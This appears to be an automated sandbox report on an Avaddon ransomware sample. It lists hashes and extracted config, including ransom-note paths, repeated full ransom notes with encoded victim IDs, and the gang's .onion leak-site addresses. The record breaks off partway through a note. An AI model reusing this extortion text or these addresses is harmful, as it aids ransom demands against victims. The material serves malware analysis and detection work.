avaddon

Sharing

Copy URL

Twitter E-mail

General

Target

2527183814cc15977e5da14c96908d1f811cf1ca33c10aa8ca73b38fb46121cb
Size

329KB
Sample

240417-p5nhqaga79
MD5

1328258c9d7b249e35361be86ee048fd
SHA1

8176b9072fe1196b5b264e6d460a6d7f4a250432
SHA256

2527183814cc15977e5da14c96908d1f811cf1ca33c10aa8ca73b38fb46121cb
SHA512

d811fbb955117627c8c43ad070bf0818c28c58f4218fb1a90bc6e7e69523b773615ed5abc97ad16bd9a021cb7ab3b20b2de4648cff2eaec72c9111b3f69aa532
SSDEEP

6144:d7Qc00H0R8HDEbOe8eF5bVudLVdw1DOh9+GCwGDdzwDzRJqT8ntt:d7P88Hq8eF5q01DeTh/ROCz

Score

10^/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\Lg0H8_readme_.txt

Family

avaddon

Ransom Note

-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .BCBeDcAdbB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjY2NC1IanNBWGt0dG1RS2tPWFFjcUVKTS9xQ3E0eGxvbG44RHRQWTcwaFFsNExncUNFWkRKMGJzRFJIRTlVS1dkbHV6Q0FiWk5UaUdHYVIvbHcyZWNQeW5HcHBKSDRqT0FhZHp2RFVvWXNDZ0JYOHN5V1JoOHpqRkdoNjZWMTRtYXAxdWpTRVlJWGlQWjZ2S2FISlBPOG5MQTl0UDdqKzREQWxUb01FMC9tQUF3R2djQm5lN3F6M0tOcFIrQ29CRUdZVWRwZW9mK0w4SlRlOU0ra2FmU2JLNFJjeU9CTFVmdkJScGFMcHlNL3lza20vSGF3eDdTUFI5SkdCcEdxcWtwUnpkL0NYK1Y3YitJOE55VU5PSGJPeWVITUM2WjlzemR0SmRyc0Z0WklVME5hVVNoMWNOdDZoSUVxYU5HeHRySWgwSXNtUkwxd2ozL3pTOW5sU252cGRhc1hyV2RudldJOXpzaTh5NXJ6Y1VNODFjV05aTDVwM2wvbENabHpUMzdrc3MzMDdvM2FUMDFWYTY4RHlWZUdBYXkxWHZlUDg2YzhXRFVDVG13cjFGR0QvWTh4Sko3TVM1MmgyVmZNRUVleVFmQVhIdE1CZDlmRVpUM1NpcGY4ZlZZMVEwY1hZQjdMUDZteHdjVi9vdHRNY284NTFNdVgzZmsxb2hKYlZJNEtZYS8zQW0rMHJKd1RUNC9ETDRVVzVtSUFVNDBVdkNZMGs3cmxjVzhRdFhUeEZvWkxKd2k0aXRONkg4Z0ZETk1YZzBzWTEvclRPWVNaeU1Ka05vMWdlRXd3VVdOdnFRZEZWR1hrWGVyK1VScjZqWWxoTHEwbjR0MGxKTjVIeVNYVUJacFdXdkI3elY3TUh1RHpQZ3JnNTRnTFZMdHk1MmYwVEZSa2t6TkYrUm4vR1VzZ2pqSkhjWkt3WXE1RHdGREJVR1ZCS3pWdGxEL2xQaUwzK0poMjhKVUtZZ2JzcHJBSnBxV0x5ZWRnVy9MVFBrZHgxOEZkSHVQM1RZYUhkUnNOMms3TUJRTjFzOHF6dHFFWFRyMWxWTDh4NkUrRkFvK0NRYVVkcTZyZFErYW82VGFwZTFTUmh0dmdIRHNrZXhGVy9FOWtYeVBlL2pDTyt6KzBxRFVyYTQyL3VhYm50R1I1YTZ2VkZTVzdQaURWeld1aGU0NmNzZEtkbmgzTHFNUTVhZDY4RVMrblN2QWxyK1l3eW9kV0hJbE1OazVXU2p2UDFpMXJLZThaSmVOZkgrRnR3RG9ERnJESmlUaWNyZFN2SlJIbTVTNk1SSCtRbm9ubjFhVEVnOW52WVRzWGd2aElJcVNpWGRZUTA5RVZtbjVPeDNkNk53UnJyT0g1SGwxa1V5VCs3RHJyWXlMc0VvOGgwbURtaElDVDZpTkxkMzRjLyt2UVk1dFFxK003STl5Tm1hQkh0bmtmQ0F3WlNTdFh0dkI0WC9VUFV4eUg1bGhVVERKcE16RTAzbUdMQkZXdWFaQ3NBVzlEOVFVc09EaDljamNSVERjK1doR0hBZFJ6cTBUdEtaS0VkNUdpSE0yczA3QmhMRE1uSDZXcWJaNGF2amFYSzdGdmZEWHdEaExwWGFEeDRkNDhnYlExbVZ2Z2R5aEF0Myt6R09xOGJUa05ITzY5azZwcnNWd3EvZGFnTjdyS3Z6SHdVSmM1ZllYUHFXWi9vK09nVVpVcDR2dnJDamdBUVJ2Zm9JbG56NFR4TVB1OUp1N1YwcWpkdllBQ2h6eTl3YkNvTEhlTGNNY2VDbkkvRG1vWVR3ZHhrc0xYbDJCTmkvOGxhaUM5bmdLdDNCcXovY05oalg2dk1DZUlpM3pSQU1CL3Uxc3FOR2x5WDBoUllNb0JiOWFZWkNnNzdVc2VxbHBJVE5TSS9HNzFZOERlUHNadTVCUnhCL1F3UXMxUlM1dmVmay9XSjlqdzBnNmMzR3I2cERMejBKSEtUUVlSZUJnQURkOFM0MXl5Rk5PeUNvWjVWTnpkbnlBbjB1Wlk4OVBvSDZ6d085aUxPWVNTMUJDb0x6ZGhLTEtvRFFPbFVQWkNvZEtGM243NkhxTm52OWNUSjNmakJGajBtVFZuL2RGei9iT1VqdEV0WDM4eFh4cWdOK0ttWStvdmRNUDNhOVBxRUYrMVBYak9ZYXhwZzJHQT09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * v2Jr8EI926o4zSw6GxhBOOC65yG8Mw

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Documents\Lg0H8_readme_.txt

Family

avaddon

Ransom Note

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Pictures\Lg0H8_readme_.txt

Family

avaddon

Ransom Note

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Documents\DfN2W_readme_.txt

Family

avaddon

Ransom Note

-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aaDbcCCADB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjY2NC1kdFhJU2o3cnpKTzNnYnpZYlJJanc2WTMvczk1SVpHRStRcTUzOHVNNzRJbWp1S0hMK002eW5DQ0VocWlXaUtPZTBMdEtXUnk1Z3VtSkRsQmMySDFyT0FxcVZpQ0U5SGZuZGRjUnBGb29ieHBDRGtKei9WQldxaFZYaUVQYW90bXNldDhQanpINWk1TVJ2bDJXaEp1Z2hBSm9tbmVISm9sVytnN2xRV0JzYld5bnFaWDVUSTByY0VNTTk2SHd0aFc4R1YwZ1hodERseEtyTjhSSWhidVJBbzFVajhCajh1YkNVRElYb0VMVWVLRVE3ZHdpclc5bDJWZ1E0cjVsZlNhMWxxV2N4cGN3M0cxRUU3eTlRWXJxUkkwT0sxcXV6MzNCQitHVXBHNWFHK2pyV2ZoTTF2Y1RBbHpyemZTenpVOHBtNHA3YTFNYi9VaTRTUTFaRXRPQUVDdFFBVzFrZ09iTjV2cXlCamEwZFJrZjhFTDRKTVliNHd0RUdaSHJKenB3NWU1TGIyczhrVVdzNyszRTROR0V3Z3JLd0hvcXIyVmNqOE43djg3b25uQmFaQ05WQ2lwNUZQT0FCaEIwRmVmODNlcEFQdlhWTUlMS1lXVUxzZUdDODBiZnhZanJHRUcrL09yOWpDUVU3aXRXaTVicU9iL1NOWEtkT3Y4ZkhJbmR6SzJZQ0s5ajNHR1JuM3FvT0tJN3FIcHE3WDVLZWhKSkxKek5TSXN0OHNaN3I4RjFWRXA2UFA3Vnl3OExYRWZjMUVIMk1DOEc0REVIM284bUp3RUZPMklORVdXWnVQUjJ3US8ydmo2c3l3YWVaNGdMMWJKR3pCVjZhSEJhaWhDUTMyVzlCbFUrdXhHeHlRbWlmVVUvM3lKZmtsQXZEM1BPdUVLemJJT1hJOGRycHB6L3dtYkZpVUVPL3pPS0tQeERzVXVEdW8wZFl0aXkvRXZIS0krOGdaS0lWdldQekIyZm1yc1M5clhlWkx1WGV6ZkZKbUZNZ1BFdUFTakRxZzE1ODM4b0lvRGxDbmhYMmZPN0dLMEl1NHdHSTN4eFRMa1VMTG1qOVBRcTdNaU1vVndwbXRSOHF6MXNXUzY1Si9xYVVaYW11ODE0N09SbkU0ZW1ZOFV0N3BPd0ZPbkZnUUM2MVJ2QUQzd1ozeitSSElZckJIQVJBQ2dMbzVPTGZlb1NueVZMelRRaTEwVzZWdUZrKzNjK1hGZEFWbmE1WEdSd0NVd2xqd2RBbnZFcTRzT3BpNEIvMGkrd1BVMWEyeDR0ZVlkajU3RW9aL2F5TzhOOXBHOTdHdEJ4L2NZWWtsekRScm5POFQzMVUvY2kvUUt1OXlsK3JmT25CRGJJRmtlcTZ1T2RFV0NxbEJ5L25xQ1VRRVR2akZkQlM3ZnZVRmgrQzhsek9IYWUvcksxaWNzcWd4UjNrQ3MxTVdpekpsNTlLSlppcm5PbTlNZ3ZvZHhRSGJ6ZllKWStkOFR4U3pwaUtmSWdjaUcrQXRYZXVXNTBUallWZEhiZ0tRNDJCZERzcmRLOFhNajZlc2VhTVZ2Z2QvRWlSRy9Dakl5TTdjazVuN044ZVN5ODB0aDJVQWVtR2tuT25ralNJTkoycW1rV2NNVkMzZllxaGdqQ0E3Q0FTZ28rQmdwbkhFMUljV0QrY3RFQ1hLSWR1VU5OQ2JvVllvdVQ3bkk3NndHMkJnRVY5SUsvZ09UWG00ZHlCUldlWXhLUXBYU3BEQVNzMmcvVjdjeStZaWVkS3ZndDNXWDVGRTdDWDRCWU1jcjZtMU8wUzBVdEJFSEc4S2czRmdDNEt3TkJGcDBienloYjdGbURpNlNySkdJZWJkVHl2TnhwczVleDJ5c290dHVjcDRXSWswOWdKaVFCTTZPcUJsbzF6NGE2aWdUaDJWL1VPQnpPTHNhOGNXSysrMk1JSW92V054Qm9HSVc1TDZJK0J5VkZrYXBnZ1F0OGwxbmw1bDVDdmJ4amk2M3h1Mm9sZHFxTENRbFFrcUpUckk5WGE2MExIYlJzSTlkYkR1SmhlV28zSDVGRzF1WEFkNHAzKzU4alJaYXhkbVprN0FQbzJnUFZWSDROdk1IdUptdWlnOGFjVytZcEtpK3FIZWl4ZnFqQS9aODNmRzRpS2VGNXRYRWVBVHFvUT09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * dHJAnBk4nDv9WPaMS8yS

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\DfN2W_readme_.txt

Family

avaddon

Ransom Note

-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aaDbcCCADB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjY2NC1kdFhJU2o3cnpKTzNnYnpZYlJJanc2WTMvczk1SVpHRStRcTUzOHVNNzRJbWp1S0hMK002eW5DQ0VocWlXaUtPZTBMdEtXUnk1Z3VtSkRsQmMySDFyT0FxcVZpQ0U5SGZuZGRjUnBGb29ieHBDRGtKei9WQldxaFZYaUVQYW90bXNldDhQanpINWk1TVJ2bDJXaEp1Z2hBSm9tbmVISm9sVytnN2xRV0JzYld5bnFaWDVUSTByY0VNTTk2SHd0aFc4R1YwZ1hodERseEtyTjhSSWhidVJBbzFVajhCajh1YkNVRElYb0VMVWVLRVE3ZHdpclc5bDJWZ1E0cjVsZlNhMWxxV2N4cGN3M0cxRUU3eTlRWXJxUkkwT0sxcXV6MzNCQitHVXBHNWFHK2pyV2ZoTTF2Y1RBbHpyemZTenpVOHBtNHA3YTFNYi9VaTRTUTFaRXRPQUVDdFFBVzFrZ09iTjV2cXlCamEwZFJrZjhFTDRKTVliNHd0RUdaSHJKenB3NWU1TGIyczhrVVdzNyszRTROR0V3Z3JLd0hvcXIyVmNqOE43djg3b25uQmFaQ05WQ2lwNUZQT0FCaEIwRmVmODNlcEFQdlhWTUlMS1lXVUxzZUdDODBiZnhZanJHRUcrL09yOWpDUVU3aXRXaTVicU9iL1NOWEtkT3Y4ZkhJbmR6SzJZQ0s5ajNHR1JuM3FvT0tJN3FIcHE3WDVLZWhKSkxKek5TSXN0OHNaN3I4RjFWRXA2UFA3Vnl3OExYRWZjMUVIMk1DOEc0REVIM284bUp3RUZPMklORVdXWnVQUjJ3US8ydmo2c3l3YWVaNGdMMWJKR3pCVjZhSEJhaWhDUTMyVzlCbFUrdXhHeHlRbWlmVVUvM3lKZmtsQXZEM1BPdUVLemJJT1hJOGRycHB6L3dtYkZpVUVPL3pPS0tQeERzVXVEdW8wZFl0aXkvRXZIS0krOGdaS0lWdldQekIyZm1yc1M5clhlWkx1WGV6ZkZKbUZNZ1BFdUFTakRxZzE1ODM4b0lvRGxDbmhYMmZPN0dLMEl1NHdHSTN4eFRMa1VMTG1qOVBRcTdNaU1vVndwbXRSOHF6MXNXUzY1Si9xYVVaYW11ODE0N09SbkU0ZW1ZOFV0N3BPd0ZPbkZnUUM2MVJ2QUQzd1ozeitSSElZckJIQVJBQ2dMbzVPTGZlb1NueVZMelRRaTEwVzZWdUZrKzNjK1hGZEFWbmE1WEdSd0NVd2xqd2RBbnZFcTRzT3BpNEIvMGkrd1BVMWEyeDR0ZVlkajU3RW9aL2F5TzhOOXBHOTdHdEJ4L2NZWWtsekRScm5POFQzMVUvY2kvUUt1OXlsK3JmT25CRGJJRmtlcTZ1T2RFV0NxbEJ5L25xQ1VRRVR2akZkQlM3ZnZVRmgrQzhsek9IYWUvcksxaWNzcWd4UjNrQ3MxTVdpekpsNTlLSlppcm5PbTlNZ3ZvZHhRSGJ6ZllKWStkOFR4U3pwaUtmSWdjaUcrQXRYZXVXNTBUallWZEhiZ0tRNDJCZERzcmRLOFhNajZlc2VhTVZ2Z2QvRWlSRy9Dakl5TTdjazVuN044ZVN5ODB0aDJVQWVtR2tuT25ralNJTkoycW1rV2NNVkMzZllxaGdqQ0E3Q0FTZ28rQmdwbkhFMUljV0QrY3RFQ1hLSWR1VU5OQ2JvVllvdVQ3bkk3NndHMkJnRVY5SUsvZ09UWG00ZHlCUldlWXhLUXBYU3BEQVNzMmcvVjdjeStZaWVkS3ZndDNXWDVGRTdDWDRCWU1jcjZtMU8wUzBVdEJFSEc4S2czRmdDNEt3TkJGcDBienloYjdGbURpNlNySkdJZWJkVHl2TnhwczVleDJ5c290dHVjcDRXSWswOWdKaVFCTTZPcUJsbzF6NGE2aWdUaDJWL1VPQnpPTHNhOGNXSysrMk1JSW92V054Qm9HSVc1TDZJK0J5VkZrYXBnZ1F0OGwxbmw1bDVDdmJ4amk2M3h1Mm9sZHFxTENRbFFrcUpUckk5WGE2MExIYlJzSTlkYkR1SmhlV28zSDVGRzF1WEFkNHAzKzU4alJaYXhkbVprN0FQbzJnUFZWSDROdk1IdUptdWlnOGFjVytZcEtpK3FIZWl4ZnFqQS9aODNmRzRpS2VGNXRYRWVBVHFvUT09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * uF5Tm4hlsaSywXFm1w0qJfvAoU9

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Documents\DfN2W_readme_.txt

Family

avaddon

Ransom Note

-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aaDbcCCADB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjY2NC1kdFhJU2o3cnpKTzNnYnpZYlJJanc2WTMvczk1SVpHRStRcTUzOHVNNzRJbWp1S0hMK002eW5DQ0VocWlXaUtPZTBMdEtXUnk1Z3VtSkRsQmMySDFyT0FxcVZpQ0U5SGZuZGRjUnBGb29ieHBDRGtKei9WQldxaFZYaUVQYW90bXNldDhQanpINWk1TVJ2bDJXaEp1Z2hBSm9tbmVISm9sVytnN2xRV0JzYld5bnFaWDVUSTByY0VNTTk2SHd0aFc4R1YwZ1hodERseEtyTjhSSWhidVJBbzFVajhCajh1YkNVRElYb0VMVWVLRVE3ZHdpclc5bDJWZ1E0cjVsZlNhMWxxV2N4cGN3M0cxRUU3eTlRWXJxUkkwT0sxcXV6MzNCQitHVXBHNWFHK2pyV2ZoTTF2Y1RBbHpyemZTenpVOHBtNHA3YTFNYi9VaTRTUTFaRXRPQUVDdFFBVzFrZ09iTjV2cXlCamEwZFJrZjhFTDRKTVliNHd0RUdaSHJKenB3NWU1TGIyczhrVVdzNyszRTROR0V3Z3JLd0hvcXIyVmNqOE43djg3b25uQmFaQ05WQ2lwNUZQT0FCaEIwRmVmODNlcEFQdlhWTUlMS1lXVUxzZUdDODBiZnhZanJHRUcrL09yOWpDUVU3aXRXaTVicU9iL1NOWEtkT3Y4ZkhJbmR6SzJZQ0s5ajNHR1JuM3FvT0tJN3FIcHE3WDVLZWhKSkxKek5TSXN0OHNaN3I4RjFWRXA2UFA3Vnl3OExYRWZjMUVIMk1DOEc0REVIM284bUp3RUZPMklORVdXWnVQUjJ3US8ydmo2c3l3YWVaNGdMMWJKR3pCVjZhSEJhaWhDUTMyVzlCbFUrdXhHeHlRbWlmVVUvM3lKZmtsQXZEM1BPdUVLemJJT1hJOGRycHB6L3dtYkZpVUVPL3pPS0tQeERzVXVEdW8wZFl0aXkvRXZIS0krOGdaS0lWdldQekIyZm1yc1M5clhlWkx1WGV6ZkZKbUZNZ1BFdUFTakRxZzE1ODM4b0lvRGxDbmhYMmZPN0dLMEl1NHdHSTN4eFRMa1VMTG1qOVBRcTdNaU1vVndwbXRSOHF6MXNXUzY1Si9xYVVaYW11ODE0N09SbkU0ZW1ZOFV0N3BPd0ZPbkZnUUM2MVJ2QUQzd1ozeitSSElZckJIQVJBQ2dMbzVPTGZlb1NueVZMelRRaTEwVzZWdUZrKzNjK1hGZEFWbmE1WEdSd0NVd2xqd2RBbnZFcTRzT3BpNEIvMGkrd1BVMWEyeDR0ZVlkajU3RW9aL2F5TzhOOXBHOTdHdEJ4L2NZWWtsekRScm5POFQzMVUvY2kvUUt1OXlsK3JmT25CRGJJRmtlcTZ1T2RFV0NxbEJ5L25xQ1VRRVR2akZkQlM3ZnZVRmgrQzhsek9IYWUvcksxaWNzcWd4UjNrQ3MxTVdpekpsNTlLSlppcm5PbTlNZ3ZvZHhRSGJ6ZllKWStkOFR4U3pwaUtmSWdjaUcrQXRYZXVXNTBUallWZEhiZ0tRNDJCZERzcmRLOFhNajZlc2VhTVZ2Z2QvRWlSRy9Dakl5TTdjazVuN044ZVN5ODB0aDJVQWVtR2tuT25ralNJTkoycW1rV2NNVkMzZllxaGdqQ0E3Q0FTZ28rQmdwbkhFMUljV0QrY3RFQ1hLSWR1VU5OQ2JvVllvdVQ3bkk3NndHMkJnRVY5SUsvZ09UWG00ZHlCUldlWXhLUXBYU3BEQVNzMmcvVjdjeStZaWVkS3ZndDNXWDVGRTdDWDRCWU1jcjZtMU8wUzBVdEJFSEc4S2czRmdDNEt3TkJGcDBienloYjdGbURpNlNySkdJZWJkVHl2TnhwczVleDJ5c290dHVjcDRXSWswOWdKaVFCTTZPcUJsbzF6NGE2aWdUaDJWL1VPQnpPTHNhOGNXSysrMk1JSW92V054Qm9HSVc1TDZJK0J5VkZrYXBnZ1F0OGwxbmw1bDVDdmJ4amk2M3h1Mm9sZHFxTENRbFFrcUpUckk5WGE2MExIYlJzSTlkYkR1SmhlV28zSDVGRzF1WEFkNHAzKzU4alJaYXhkbVprN0FQbzJnUFZWSDROdk1IdUptdWlnOGFjVytZcEtpK3FIZWl4ZnFqQS9aODNmRzRpS2VGNXRYRWVBVHFvUT09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * KbFvwlrf7LGhzjGAukc6L0PQIQAG8WW

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Downloads\DfN2W_readme_.txt

Family

avaddon

Ransom Note

-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aaDbcCCADB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjY2NC1kdFhJU2o3cnpKTzNnYnpZYlJJanc2WTMvczk1SVpHRStRcTUzOHVNNzRJbWp1S0hMK002eW5DQ0VocWlXaUtPZTBMdEtXUnk1Z3VtSkRsQmMySDFyT0FxcVZpQ0U5SGZuZGRjUnBGb29ieHBDRGtKei9WQldxaFZYaUVQYW90bXNldDhQanpINWk1TVJ2bDJXaEp1Z2hBSm9tbmVISm9sVytnN2xRV0JzYld5bnFaWDVUSTByY0VNTTk2SHd0aFc4R1YwZ1hodERseEtyTjhSSWhidVJBbzFVajhCajh1YkNVRElYb0VMVWVLRVE3ZHdpclc5bDJWZ1E0cjVsZlNhMWxxV2N4cGN3M0cxRUU3eTlRWXJxUkkwT0sxcXV6MzNCQitHVXBHNWFHK2pyV2ZoTTF2Y1RBbHpyemZTenpVOHBtNHA3YTFNYi9VaTRTUTFaRXRPQUVDdFFBVzFrZ09iTjV2cXlCamEwZFJrZjhFTDRKTVliNHd0RUdaSHJKenB3NWU1TGIyczhrVVdzNyszRTROR0V3Z3JLd0hvcXIyVmNqOE43djg3b25uQmFaQ05WQ2lwNUZQT0FCaEIwRmVmODNlcEFQdlhWTUlMS1lXVUxzZUdDODBiZnhZanJHRUcrL09yOWpDUVU3aXRXaTVicU9iL1NOWEtkT3Y4ZkhJbmR6SzJZQ0s5ajNHR1JuM3FvT0tJN3FIcHE3WDVLZWhKSkxKek5TSXN0OHNaN3I4RjFWRXA2UFA3Vnl3OExYRWZjMUVIMk1DOEc0REVIM284bUp3RUZPMklORVdXWnVQUjJ3US8ydmo2c3l3YWVaNGdMMWJKR3pCVjZhSEJhaWhDUTMyVzlCbFUrdXhHeHlRbWlmVVUvM3lKZmtsQXZEM1BPdUVLemJJT1hJOGRycHB6L3dtYkZpVUVPL3pPS0tQeERzVXVEdW8wZFl0aXkvRXZIS0krOGdaS0lWdldQekIyZm1yc1M5clhlWkx1WGV6ZkZKbUZNZ1BFdUFTakRxZzE1ODM4b0lvRGxDbmhYMmZPN0dLMEl1NHdHSTN4eFRMa1VMTG1qOVBRcTdNaU1vVndwbXRSOHF6MXNXUzY1Si9xYVVaYW11ODE0N09SbkU0ZW1ZOFV0N3BPd0ZPbkZnUUM2MVJ2QUQzd1ozeitSSElZckJIQVJBQ2dMbzVPTGZlb1NueVZMelRRaTEwVzZWdUZrKzNjK1hGZEFWbmE1WEdSd0NVd2xqd2RBbnZFcTRzT3BpNEIvMGkrd1BVMWEyeDR0ZVlkajU3RW9aL2F5TzhOOXBHOTdHdEJ4L2NZWWtsekRScm5POFQzMVUvY2kvUUt1OXlsK3JmT25CRGJJRmtlcTZ1T2RFV0NxbEJ5L25xQ1VRRVR2akZkQlM3ZnZVRmgrQzhsek9IYWUvcksxaWNzcWd4UjNrQ3MxTVdpekpsNTlLSlppcm5PbTlNZ3ZvZHhRSGJ6ZllKWStkOFR4U3pwaUtmSWdjaUcrQXRYZXVXNTBUallWZEhiZ0tRNDJCZERzcmRLOFhNajZlc2VhTVZ2Z2QvRWlSRy9Dakl5TTdjazVuN044ZVN5ODB0aDJVQWVtR2tuT25ralNJTkoycW1rV2NNVkMzZllxaGdqQ0E3Q0FTZ28rQmdwbkhFMUljV0QrY3RFQ1hLSWR1VU5OQ2JvVllvdVQ3bkk3NndHMkJnRVY5SUsvZ09UWG00ZHlCUldlWXhLUXBYU3BEQVNzMmcvVjdjeStZaWVkS3ZndDNXWDVGRTdDWDRCWU1jcjZtMU8wUzBVdEJFSEc4S2czRmdDNEt3TkJGcDBienloYjdGbURpNlNySkdJZWJkVHl2TnhwczVleDJ5c290dHVjcDRXSWswOWdKaVFCTTZPcUJsbzF6NGE2aWdUaDJWL1VPQnpPTHNhOGNXSysrMk1JSW92V054Qm9HSVc1TDZJK0J5VkZrYXBnZ1F0OGwxbmw1bDVDdmJ4amk2M3h1Mm9sZHFxTENRbFFrcUpUckk5WGE2MExIYlJzSTlkYkR1SmhlV28zSDVGRzF1WEFkNHAzKzU4alJaYXhkbVprN0FQbzJnUFZWSDROdk1IdUptdWlnOGFjVytZcEtpK3FIZWl4ZnFqQS9aODNmRzRpS2VGNXRYRWVBVHFvUT09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * O

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Music\DfN2W_readme_.txt

Family

avaddon

Ransom Note

-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aaDbcCCADB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- 